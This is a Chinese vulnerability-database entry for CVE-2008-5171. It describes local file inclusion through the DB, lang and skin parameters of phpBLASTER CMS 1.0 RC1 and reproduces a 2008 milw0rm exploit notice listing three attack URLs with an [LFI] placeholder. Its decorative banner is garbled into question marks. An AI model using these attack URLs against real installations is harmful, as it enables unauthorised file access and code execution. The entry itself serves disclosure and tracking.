phpBLASTER CMS 'index.php'多个目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1115563 漏洞类型 路径遍历
发布时间 2008-06-26 更新时间 2008-11-20
CVE编号 CVE-2008-5171 CNNVD-ID CNNVD-200811-330
漏洞平台 PHP CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/5952
https://www.securityfocus.com/bid/29983
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200811-330
|漏洞详情
phpBLASTERCMS1.0RC1的admin/minibb/index.php中存在多个目录遍历漏洞。当register_globals被激活时,远程攻击者可以借助(1)DB,(2)lang,和(3)skin参数中的目录遍历序列,包含和执行任意本地文件。
|漏洞EXP
???????????????????????????????????????????????????????????????????????????????
??                             C r a C k E r                                ??
??          T H E   C R A C K   O F   E T E R N A L   M I G H T             ??
??????????????????????????????????????????????????????????????????????????????

 ?????      From The Ashes and Dust Rises An Unimaginable crack....      ?????
??????????????????????????????????????????????????????????????????????????????
??                          [ Local File Include ]                          ??
??????????????????????????????????????????????????????????????????????????????
:   Author   : CraCkEr                : :                                    :
?   Group    : uNiTeD CraCkiNg ForCE  ? ?                                    ?
?   Script   : phpBLASTER CMS 1.0 RC1 ? ?         Register Globals :         ?
?   Download : SourceForge.net        ? ?                                    ?
?   Method   : GET                    ? ?          [?] ON   [ ] OFF          ?
?   Critical : High [????????]        ? ?                                    ?
?   Impact   : System access          ? ?                                    ?
? ????????????????????????????????????? ???????????????????????????????????? ?
?                              DALnet #crackers                             ??
??????????????????????????????????????????????????????????????????????????????
:                                                                            :
?  Release Notes:                                                            ?
?  ?????????????                                                             ?
?  Typically used for remotely exploitable vulnerabilities that can lead to  ?
?  system compromise.                                                        ?
?                                                                            ?

??????????????????????????????????????????????????????????????????????????????
??                             Exploit URL's                                ??
??????????????????????????????????????????????????????????????????????????????


http://localhost/path/html/admin/minibb/index.php?DB=[LFI]

http://localhost/path/html/admin/minibb/index.php?lang=[LFI]

http://localhost/path/html/admin/minibb/index.php?skin=[LFI]



??????????????????????????????????????????????????????????????????????????????
 
Greets:
       The_PitBull, Raz0r, iNs, Sad, CwG GeNiuS

??????????????????????????????????????????????????????????????????????????????
??                              © CraCkEr 2008                              ??
??????????????????????????????????????????????????????????????????????????????

# milw0rm.com [2008-06-26]
|受影响的产品
phpBLASTER phpBLASTER 1.0 rc1
|参考资料

来源:MILW0RM
名称:5952
链接:http://www.milw0rm.com/exploits/5952